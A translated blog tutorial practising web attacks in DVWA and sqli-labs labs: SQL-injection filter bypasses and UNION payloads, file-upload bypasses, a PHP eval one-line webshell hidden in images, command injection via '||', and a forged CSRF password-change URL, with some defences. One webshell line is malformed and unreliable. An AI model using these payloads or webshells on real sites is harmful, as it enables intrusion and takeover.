Detailed explanation of SQL injection - security (Part 2)

If there are any errors in this article or you have any suggestions, please feel free to contact me, thank you!
Preface: Based on the initial learning of SQL injection in the previous two days, continue to practice in the Metasploitable-Linux environment.
1. We learned SQL injection earlier, so of course we need to prevent it. Since web injection is very harmful, various defense technologies have emerged one after another.

1. Programmers will consciously set up defenses or perform security tests to block web injections when writing code.
2. Hardware or software WAF products produced by major security vendors

Blacklist filtering technology

1. Filter common keywords in SQL key fields: and, or, union all select, quotation marks, spaces, etc. There are also some similar techniques that are not filtering but using escape functions or stripping illegal keywords.

Bypass method:

1. 1. Case distortion (id=-1 UniOn sEleCt 1,2,3……)
2. 2. Encoding: hex code, urlencode
3. 3. Comment '/ or /'
4. 4. Filter replacement (and–&&, or–||)
5. 5. Truncation

2. File upload vulnerability

When we surf the Internet, we often use the file upload function, such as uploading an avatar picture, uploading a file, uploading a video, etc. I know that this is a normal function, but have you ever thought about how the server processes or parses these files after they are uploaded? If the server is not secure enough when processing these uploaded files, it will lead to security incidents, such as: Uploading a web script file for the server to execute

1. (1) Uploading Trojan virus files to induce users or administrators to download
2. (2) Upload phishing files
3. (3) Uploading fraudulent documents

File upload vulnerability core

For a file upload attack to be successful, two elements must generally be met:

1. (1) The webshell file can be successfully uploaded to the server
2. (2) The file can be parsed by the server or we can access the uploaded file

Implementing the core - upload bypass technology

Generally speaking, the detection techniques encountered when uploading files are:

1. (1) Client-side JavaScript detection (usually detecting file extensions)
2. (2) Server-side MIME type detection (detecting Content-Type content)
3. (3) Server directory path detection (detection of content related to the path parameter)
4. (4) Server-side file extension detection (detection of content related to file extension)
5. (5) Server-side file content detection (detecting whether the content is legal or contains malicious code)

Client-side detection bypass (javascript detection)

This type of detection usually contains javascript code on the upload page that specifically detects file uploads. The most common thing is to detect whether the extension is legal. This type of bypass is very simple.
Method: Create a webshell file (such as shell.php) -> Change it to a legal extension (shell.png) -> Burp intercepts and changes it to (shell.php) -> Upload

Server-side detection bypass (MIME type detection)

This detection is performed on the server, and the main check is the content-type value (whitelist or blacklist). Of course, this bypass is also simple.
Method: Create a webshell file (such as shell.php, Content-Type: text/plain) -> Burp interception changed to (sontent-Type: image/gif) -> upload

Server detection bypass (directory path detection)

This detection is performed on the server, and generally checks whether the path is legal, but there is no defense for any slightly special ones. For example, shell.php.[\0].png [\0], 123.php0x00.png, where 0x00 is the truncation character of PHP and C languages, which means that when the server reads the file and encounters [\0] when reading shell.php, it will terminate the file and execute it as shell.php. There is also a similar post submission file shell.php%00.png
Note: To bypass background detection, you just need to give him the desired file extension and then cut off the real suffix.

Server-side detection bypass (file extension detection)

As the name implies, it checks the file extension, usually through whitelist and blacklist defense.

1. Blacklist, for example, the extension cannot contain html, php, php3, php4, asp, exe, bat, jsp + file name case bypass using file names like AsP, pHp to bypass blacklist detection

1. (1) List bypass: Use a list that is not in the blacklist to attack, such as asa or cer that is not in the blacklist
2. (2) Bypassing with special file names, for example, changing the file name in the sent http package to test.asp. or test.asp_ (underscore represents space). This naming method is not allowed in Windows systems, so it is necessary to modify it in burp or the like. After bypassing verification, the trailing dot and space will be automatically removed by the Windows system. However, please note that Unix/Linux systems do not have this feature.
3. (3) htaccess file attack combined with list bypass, upload a custom .htaccess, you can easily bypass various detection
4. (4) Parsing call/vulnerability bypass This type of vulnerability can be bypassed by simply uploading a non-blacklist file that has been injected with code, and then using the parsing call/vulnerability
5. (5) Whitelist detection

2. The whitelist is relatively safer than the blacklist, but it is not necessarily absolutely safe.

(1) 0x00 truncation bypass

Use the method of test.asp%00.jpg to truncate, which belongs to the whitelist file, and then use the detection logic vulnerability of the server code to attack. At present, I have only encountered this vulnerability in asp programs + parsing call/vulnerability bypass. This type of vulnerability can be directly uploaded with a whitelist file with code injection, and then use the parsing call/vulnerability

(2) .htaccess file attack

In the PHP manual, it is mentioned in the move_uploaded_file section that there is a warning which states 'If the destination file already exists, it will be overwritten.' If PHP security is not configured properly, you can use the move_uploaded_file function to overwrite the .htaccess file on the server with your own file. This way, you can define the parsing list arbitrarily.

Server-side detection bypass (file content detection)

If the file content detection is set more strictly, then the upload attack will become very difficult. It can also be said that it is the last level of detection at the code layer. If it is broken, even if there is no vulnerability in the code layer, it will bring opportunities to exploit the parsing vulnerability in the application layer later.

(1) The file magic number check mainly detects the file magic number at the beginning of the file content, for example: to bypass jpg Value = FF D8 FF E0 00 10 4A 46 49 46. To bypass the magic number detection for gif files Value = 47 49 46 38 39 61 To bypass the magic number detection for png files Value = 89 50 4E 47

(2) File-related information detection

The getimagesize() function is commonly used to detect image file related information. You only need to forge the file header part. That is, on the basis of the magic number, some file information is added. It is a bit like the following structure

GIF89a

(...some binary data for image...)
 <?php phpinfo(); ?>
(... skipping the rest of binary data ...)

(3) File loading detection

This is the most abnormal detection. Generally, it calls API or function to perform file loading test. The most common one is image rendering test. The more abnormal one even performs secondary rendering. The attack method for rendering/loading test is code injection bypass. The attack method for secondary rendering is to attack the file loader itself.

three,

1. (1) Copy the corresponding URL below, click Load URL, and then click Execute

(2) Construct a closure and get the database name – dvwa. Then, follow the previous routine and find that the system reports an error. The error message is as follows

The system automatically adds the \ symbol, which means an error occurs in the constructed function. We should avoid this phenomenon so that the system does not automatically add special symbols to the constructor. In this case, you can use hex code to convert the string dvwa into hexadecimal (to 0x...), so that the single quote symbol will not be used in the constructor. At this time, the system will no longer automatically add special characters to the constructor, destroying the constructor.

(3) Similarly, use the SQL statement used previously to extract the data.

2. Take Less-25 as an example

(1)

http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 1,2,database()--+ //Construct closure according to the echo, and burst out database()

(2)

http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 1,table_name,column_name from infoorrmation_schema.columns where table_name = table_name and table_schema = database()--+ //Expose table name table_name, column name column_name

(3)

http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 3,2,id from emails--+ //Blast data

Summary: First, we continuously construct closed inputs and observe the echo. We find that the system filters the "and" string and "+" (+ is equivalent to the space bar)

Then we guess that we can use mixed case and, or interlaced and discontinuous and, or use other characters instead of and - such as && (the main purpose is to use and), or use hex code or urlencode conversion methods; similarly, the string "or", or or appearing in a word (such as information) can also use the above method. The key is to bypass the system's filtering and achieve a certain purpose

3. Take Less-26 as an example

The and character is the same as Less-25. The spaces to be filtered out can be %20 -- space, or the encoding of the TAB key, or the encoding of the newline key.

4. Take http://192.168.122.130/DVWA-1.9/vulnerabilities/exec/ as an example. The interface is as follows. It is a pingable interface.

There is a vulnerability in this interface, which means that you can use the connection symbol to complete other actions while pinging. When you enter 127.0.0.1 || pwd in the input bar, the following situation occurs

The current file directory appears in the interface, and then we can use this vulnerability to obtain some desired data. Here we mention the "One Sentence Trojan"

echo '<?php @eval($_POST[123]);?>' > 123.php

[Sometimes, in order to prevent the victim from discovering, other forms of sentences are often used together with the "one-sentence Trojan"

 <?php fputs(fopen("345.php","w")),<?php @eval($_POST[1234]);?>' >1234.php

4. Combining File Inclusion and File Upload to Implement Attack

(1) Select DVWA security as Low at http://192.168.122.130/DVWA-1.9/security.php
Then File Upload uploads a .php file with a one-line Trojan, and then adds information to China Chopper through known directories to obtain all directories - at this point, the file can be tampered with, deleted, uploaded, etc. (sometimes it can be bypassed by renaming the file name: 123.png0x00.php - here 0x00 represents the end of the name)

Use Chinese Chopper to add the following code: echo '<?php @eval($_POST[123]);?>' > 123.php

Then you can get the directory through China Chopper as follows:

(2) Select DVWA security as Medium at http://192.168.122.130/DVWA-1.9/security.php
At this time, uploading the .php file will echo an error and cannot be uploaded, so we change the Trojan file format to a format that supports upload. There is a Trojan in the png format file - here we take the png format as an example

Manually set browser proxy

Start BurpLoader and rename the captured packets!

Then select Action->Send to Repeater, then click Go in Repeater. Observe the window on the right and you will find that the file has been uploaded. Open China Chopper and access it according to the previous steps.

(3) Select DVWA security as High at http://192.168.122.130/DVWA-1.9/security.php

First, if you see that the picture has been uploaded, then the uploaded picture must have been processed (a sentence Trojan has been added). That is, open the picture encoding tool winhex, add a sentence Trojan to the encoding tool, and regenerate a new encoded picture.

Of course, you can also use the cmd command: copy 1.png/b+123.php /a TCP.png. Here 1.png is a normal picture, 123.php is a sentence Trojan. Recompose them into a new picture named TCP.png, and then upload it to succeed (cmd is used above).

After the image is uploaded, it cannot be captured and renamed like the Medium level. There should be corresponding security processing on the web server side.
At this time, we need to trigger it manually (of course, we can also wait for the attacked system administrator to click on the picture to trigger it). After triggering, we can use the same method to open China Chopper and obtain the directory.

5. Ideas for dealing with some abnormal levels:

compare, observe what has not changed before and after uploading (through binary anomalies), and then make certain modifications to the uploaded data to achieve a certain purpose.
Some other attack methods:

1. 1. Take http://192.168.122.130/DVWA-1.9/vulnerabilities/upload/ as an example. Write a trigger instruction in the picture. When the administrator types a command, the picture is executed and the code contained in the picture is executed. That is, a commonly used trigger instruction is pre-buried!
2. 2. Find the specific location of the system's default temporary file storage to be attacked, and then change the content of the file (for example, add an executable file containing a sentence Trojan to the file, etc.) to achieve the desired effect
3. 3. For the system that automatically modifies the file name for uploaded files, it will make us unable to execute the non-executable files we uploaded. At this time, we can do this: because the device has a certain limit in processing files, it can transmit the same file at a high frequency every second, so that the background will not have time to modify the file name of one or two files, so that the file name will not be modified. Then if we can access the file, we can execute it to attack!

6. CSRF: Cross site Request Forgery (using cookie value)

Construct a URL to trick the victim into clicking on the link, and then use the victim's cookies to enable the victim to change the password without the victim's knowledge

http://192.168.122.130/DVWA-1.9/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change#

For example: For example, a hacker uses his own account password to log in to a website, then clicks on the password change interface and constructs a password change URL. When the hacker wants to launch an attack, he induces a victim (who has previously used a browser to log in to the website and has cookies stored in the browser) to click on the previously constructed URL, and then changes the password without the victim's knowledge. The hacker knows this password. If the attack is successful at this time, the hacker can use the password constructed when constructing the URL before to log in to the website as the victim and perform a series of operations!

Some current defenses:

1. You can use verification code for defense

2. Websites that require the original password to change the password

3. Defense method: no-referrer-when-downgrade

Linking from one website to another will generate a new HTTP request. Referrer is a field in the HTTP request that indicates the source.
no-referrer-when-downgrade means that when the https protocol is downgraded to the http protocol, no referrer is sent to the server of the redirected website.

4. The anti-counterfeiting mechanism token, unlike cookies, can block most CSRF attacks (everyone has an anti-counterfeiting code, which others cannot guess. If you want to change your password, you must use your own token to succeed) - the token needs to be irregular and preferably encrypted.

The above is the detailed SQL injection security integration introduced by the editor. I hope it will be helpful to everyone. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website!